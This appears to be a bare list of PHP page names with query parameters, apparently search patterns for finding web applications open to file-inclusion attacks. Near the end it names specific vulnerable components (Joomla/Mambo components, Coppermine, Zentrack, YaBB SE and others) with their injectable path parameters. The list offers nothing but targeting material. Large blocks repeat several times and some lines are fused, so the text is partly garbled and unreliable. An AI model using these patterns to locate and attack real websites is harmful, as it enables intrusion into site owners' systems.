general.php?abre=
general.php?link=
default.php?id=
standard.php?panel=
show.php?channel=
enter.php?r=
index3.php?phpbb_root_path=
gery.php?where=
head.php?middle=
sub*.php?load=
gery.php?sp=
show.php?chapter=
sub*.php?b=
general.php?adresa=
print.php?goto=
sub*.php?sp=
template.php?doshow=
padrao.php?base_dir=
index2.php?my=
include.php?w=
start.php?op=
main.php?section=
view.php?header=
layout.php?menue=
head.php?y=
sub*.php?content=
show.php?type=
base.php?id=
mod*.php?qry=
default.php?strona=
sitio.php?chapter=
gery.php?index=
nota.php?h=
page.php?oldal=
enter.php?panel=
blank.php?t=
start.php?pollname=
sub*.php?module=
enter.php?thispage=
mod*.php?index=
sitio.php?r=
sub*.php?play=
index2.php?doshow=
index2.php?chapter=
show.php?path=
gery.php?to=
info.php?base_dir=
gery.php?abre=
gery.php?pag=
view.php?channel=
default.php?mod=
index.php?op=
general.php?pre=
padrao.php?type=
template.php?pag=
standard.php?pre=
blank.php?ref=
down*.php?z=
general.php?inc=
home.php?read=
pagina.php?section=
default.php?basepath=
index.php?pre=
sitio.php?pageweb=
base.php?seite=
*inc*.php?j=
index2.php?filepath=
file.php?type=
index1.php?oldal=
index2.php?second=
index3.php?sekce=
info.php?filepath=
base.php?opcion=
path.php?category=
index3.php?start=
start.php?rub=
*inc*.php?i=
blank.php?pre=
general.php?channel=
index2.php?OpenPage=
page.php?section=
mod*.php?middle=
index1.php?goFile=
blank.php?action=
principal.php?loader=
sub*.php?op=
main.php?addr=
start.php?mid=
gery.php?secao=
pagina.php?tipo=
index.php?w=
head.php?where=
principal.php?tipo=
press.php?loader=
gery.php?showpage=
gery.php?go=
enter.php?start=
press.php?lang=
general.php?p=
index.php?sekce=
index2.php?get=
sitio.php?go=
include.php?cont=
sub*.php?where=
index3.php?index=
path.php?recipe=
info.php?loader=
print.php?sp=
page.php?phpbb_root_path=
path.php?bOdy=
principal.php?menue=
print.php?cont=
pagina.php?z=
default.php?mid=
blank.php?xlink=

sub*.php?oldal=
general.php?b=
include.php?left=
print.php?sivu=
press.php?OpenPage=
default.php?cont=
general.php?pollname=
template.php?nivel=
enter.php?page=
file.php?middle=
standard.php?str=
gery.php?get=
main.php?v=
down*.php?subject=
enter.php?sivu=
path.php?option=
index.php?strona=
index1.php?choix=
index2.php?f=
press.php?destino=
pagina.php?channel=
principal.php?b=
home.php?include=
head.php?numero=
general.php?ref=
main.php?dir=
gery.php?cont=
principal.php?type=
file.php?param=
default.php?secao=
path.php?pageweb=
info.php?r=
base.php?phpbb_root_path=
main.php?itemnav=
view.php?pg=
pagina.php?choix=
default.php?itemnav=
index2.php?cmd=
layout.php?url=
index.php?path=
index1.php?second=
start.php?modo=
index1.php?get=
index3.php?my=
sub*.php?left=
print.php?inc=
view.php?type=
path.php?*[*]*=
base.php?adresa=
index3.php?oldal=
standard.php?bOdy=
base.php?path=
principal.php?strona=
info.php?l=
template.php?left=
head.php?loc=
page.php?ir=
print.php?path=
down*.php?path=
sitio.php?opcion=
pagina.php?category=
press.php?menu=
index2.php?pref=
sitio.php?incl=
show.php?ki=
index3.php?x=
page.php?strona=
*inc*.php?open=
index3.php?secao=
standard.php?*[*]*=
template.php?basepath=
standard.php?goFile=
index2.php?ir=
file.php?modo=
gery.php?itemnav=
main.php?oldal=
down*.php?showpage=
start.php?destino=
blank.php?rub=
path.php?ir=
layout.php?var=
index1.php?texto=
start.php?pg=
index1.php?showpage=
info.php?go=
path.php?load=
index3.php?abre=
blank.php?where=
info.php?start=
page.php?secao=
nota.php?pag=
nota.php?second=
index2.php?to=
standard.php?name=
start.php?strona=
mod*.php?numero=
press.php?home=
info.php?z=
mod*.php?path=
blank.php?base_dir=
base.php?texto=
nota.php?secc=
index.php?tipo=
index.php?goto=
print.php?pag=
view.php?secao=
general.php?strona=
show.php?my=
page.php?e=
padrao.php?index=
gery.php?thispage=
start.php?base_dir=
default.php?tipo=
gery.php?panel=
standard.php?ev=
standard.php?destino=
general.php?middle=
main.php?basepath=
standard.php?q=
index1.php?tipo=
mod*.php?choix=
template.php?ir=
show.php?adresa=
general.php?mid=
index3.php?adresa=
pagina.php?sec=
template.php?secao=
home.php?w=
general.php?content=
sub*.php?recipe=
main.php?category=
enter.php?viewpage=
main.php?ir=
show.php?pageweb=
principal.php?ir=
default.php?pageweb=
index.php?oldal=
head.php?d=
gery.php?mid=
index.php?type=
standard.php?j=
show.php?oldal=
enter.php?link=
enter.php?content=
blank.php?filepath=
standard.php?channel=
base.php?*[*]*=
info.php?incl=
down*.php?include=
press.php?modo=
file.php?choix=
press.php?type=
blank.php?goto=
index3.php?showpage=
principal.php?subject=
start.php?chapter=
show.php?r=
pagina.php?thispage=
general.php?chapter=
page.php?base_dir=
page.php?qry=
show.php?incl=
page.php?*[*]*=
main.php?h=
file.php?seccion=
default.php?pre=
principal.php?index=
principal.php?inc=
home.php?z=
pagina.php?in=
show.php?play=
nota.php?subject=
default.php?secc=
default.php?loader=
padrao.php?var=
mod*.php?b=
default.php?showpage=
press.php?channel=
pagina.php?ev=
sitio.php?name=
page.php?option=
press.php?mid=
down*.php?corpo=
view.php?get=
print.php?thispage=
principal.php?home=
show.php?param=
standard.php?sivu=
index3.php?panel=
include.php?play=
path.php?cmd=
file.php?sp=
template.php?section=
view.php?str=
blank.php?left=
nota.php?lang=
path.php?sivu=
main.php?e=
default.php?ref=
start.php?seite=
default.php?inc=
print.php?disp=
home.php?h=
principal.php?loc=
index3.php?sp=
gery.php?var=
sub*.php?base_dir=
path.php?middle=
pagina.php?str=
base.php?play=
base.php?v=
sitio.php?sivu=
main.php?r=
file.php?nivel=
start.php?sivu=
template.php?c=
general.php?second=
sub*.php?mod=
home.php?loc=
head.php?corpo=
standard.php?op=
index2.php?inc=
info.php?pref=
base.php?basepath=
print.php?basepath=
*inc*.php?m=
base.php?home=
layout.php?strona=
padrao.php?url=
sitio.php?oldal=
pagina.php?read=
index1.php?go=
standard.php?s=
page.php?eval=
index.php?j=
pagina.php?pr=
start.php?secao=
template.php?*[*]*=
nota.php?get=
index3.php?link=
home.php?e=
gery.php?name=
nota.php?eval=
sub*.php?abre=
index2.php?load=
principal.php?in=
view.php?load=
mod*.php?action=
default.php?p=
head.php?c=
template.php?viewpage=
view.php?mid=
padrao.php?addr=
view.php?go=
file.php?basepath=
home.php?pre=
include.php?goFile=
layout.php?play=
index1.php?subject=
info.php?middlePart=
down*.php?pg=
sub*.php?bOdy=
index.php?option=
sub*.php?chapter=
default.php?t=
head.php?opcion=
nota.php?panel=
sitio.php?left=
show.php?include=
pagina.php?start=
head.php?choix=
index3.php?tipo=
index3.php?choix=
down*.php?channel=
base.php?pa=
nota.php?sekce=
show.php?l=
show.php?index=
blank.php?url=
start.php?thispage=
nota.php?play=
show.php?second=
enter.php?include=
principal.php?middle=
main.php?where=
padrao.php?link=
path.php?strona=
index3.php?read=
mod*.php?module=
standard.php?viewpage=
standard.php?pr=
*inc*.php?showpage=
pagina.php?ref=
path.php?pname=
padrao.php?mid=
info.php?eval=
include.php?path=
page.php?subject=
sub*.php?qry=
head.php?module=
nota.php?opcion=
head.php?abre=
base.php?str=
home.php?bOdy=
gery.php?module=
head.php?sivu=
page.php?inc=
pagina.php?header=
mod*.php?v=
home.php?doshow=
padrao.php?n=
index1.php?chapter=
padrao.php?basepath=
index.php?r=
index3.php?seccion=
sitio.php?mid=
index.php?where=
general.php?type=

pagina.php?goto=
page.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php

path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
gery.php?page=
index.php?action=
press.php?pname=
down*.php?v=
index3.php?second=
show.php?recipe=
main.php?pre=
file.php?numero=
print.php?str=
standard.php?link=
nota.php?OpenPage=
view.php?pollname=
print.php?l=
index.php?go=
standard.php?numero=
view.php?pr=
down*.php?read=
down*.php?action=
index1.php?OpenPage=
principal.php?left=
mod*.php?start=
file.php?bOdy=
gery.php?pg=
blank.php?qry=
base.php?eval=
default.php?left=
gery.php?param=
blank.php?pa=
nota.php?b=
path.php?loader=
start.php?o=
include.php?include=
nota.php?corpo=
enter.php?second=
sub*.php?pname=
mod*.php?pageweb=
principal.php?addr=
standard.php?action=
template.php?lang=
include.php?basepath=
sub*.php?ir=
down*.php?nivel=
path.php?opcion=
print.php?category=
print.php?menu=
layout.php?secao=
template.php?param=
standard.php?ref=
base.php?include=
blank.php?bOdy=
path.php?pref=
print.php?g=
padrao.php?subject=
nota.php?modo=
index3.php?loader=
template.php?seite=
general.php?pageweb=
index2.php?param=
path.php?nivel=
page.php?pref=
press.php?pref=
enter.php?ev=
standard.php?middle=
index2.php?recipe=
blank.php?dir=
home.php?pageweb=
view.php?panel=
down*.php?home=
head.php?ir=
mod*.php?ir=
show.php?pagina=
default.php?base_dir=
show.php?loader=
path.php?mid=
blank.php?abre=
down*.php?choix=
info.php?opcion=
page.php?loader=
principal.php?oldal=
index1.php?load=
home.php?content=
pagina.php?sekce=
file.php?n=
include.php?redirect=
print.php?itemnav=
enter.php?index=
print.php?middle=
sitio.php?goFile=
head.php?include=
enter.php?e=
index.php?play=
enter.php?id=
view.php?mod=
show.php?nivel=
file.php?channel=
layout.php?choix=
info.php?bOdy=
include.php?go=
index3.php?nivel=
sub*.php?include=
path.php?numero=
principal.php?header=
main.php?opcion=
enter.php?s=
sub*.php?pre=
include.php?index=
gery.php?pageweb=
padrao.php?path=
info.php?url=
press.php?ev=
index1.php?pg=
print.php?in=
general.php?modo=
head.php?ki=
press.php?my=
index1.php?pollname=
principal.php?to=
default.php?play=
page.php?g=
nota.php?pg=
blank.php?destino=
blank.php?z=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
module_db.php?pivot_path= module_db.php?pivot_path=”
/classes/adodbt/sql.php?classes_dir= /classes/adodbt/sql.php?classes_dir=”
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=
com_extended_registration
smarty_config.php?root_dir= “smarty”
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= site:.gr
send_reminders.php?includedir= “send_reminders.php?includedir=”
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= com_rsgery
inc/functions.inc.php?config[ppa_root_path]= “Index – Albums” index.php
/components/com_cpg/cpg.php?mosConfig_absolute_path= com_cpg”
[Script Path]/admin/index.php?o= admin/index.php”;
/admin/index.php?o= admin/index.php”;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar
admin/doeditconfig.php?thispath=../includes&config[path]= “admin”
/components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
components/com_simpleboard/image_upload.php?sbp= com_simpleboard”
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= coppermine
mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=
zentrack/index.php?configFile=
inst/index.php?lng=../../include/main.inc&G_PATH=
pivot/modules/module_db.php?pivot_path=
include/write.php?dir=
includes/header.php?systempath=
becommunity/community/index.php?pageurl=
agendax/addevent.inc.php?agendax_path=
myPHPCalendar/admin.php?cal_dir=
yabbse/Sources/Packages.php?sourcedir=
zboard/zboard.php
path_of_cpcommerce/_functions.php?prefixpage.php?pa=
default.php?menue=
main.php?goto=
index1.php?abre=
info.php?seccion=
index2.php?pa=
layout.php?pageweb=
nota.php?disp=
index1.php?bOdy=
default.php?nivel=
show.php?header=
down*.php?pag=
start.php?tipo=
standard.php?w=
index.php?open=
blank.php?menu=
general.php?nivel=
padrao.php?nivel=
*inc*.php?addr=
index.php?var=
home.php?redirect=
*inc*.php?link=
*inc*.php?incl=
padrao.php?corpo=
down*.php?url=
enter.php?goto=
down*.php?addr=
sub*.php?j=
principal.php?f=
sub*.php?menue=
index2.php?section=
general.php?my=
head.php?loader=
general.php?goto=
include.php?dir=
start.php?header=
blank.php?in=
base.php?name=
nota.php?goFile=
head.php?base_dir=
mod*.php?recipe=
press.php?pr=
padrao.php?*[*]*=
layout.php?opcion=
print.php?rub=
index.php?pr=
general.php?seite=
pagina.php?numero=
*inc*.php?pg=
nota.php?rub=
view.php?seite=
pagina.php?recipe=
index.php?pref=
page.php?action=
page.php?ev=
show.php?ir=
head.php?index=
mod*.php?pname=
view.php?ir=
*inc*.php?start=
principal.php?rub=
principal.php?corpo=
padrao.php?middle=
base.php?pname=
template.php?header=
view.php?sp=
main.php?name=
nota.php?m=
blank.php?open=
head.php?dir=
page.php?pname=
*inc*.php?k=
index.php?pollname=
head.php?oldal=
index1.php?str=
template.php?choix=
down*.php?pollname=
page.php?recipe=
template.php?corpo=
nota.php?sec=
info.php?*[*]*=
sub*.php?*[*]*=
page.php?q=
index1.php?type=
gery.php?y=
standard.php?lang=
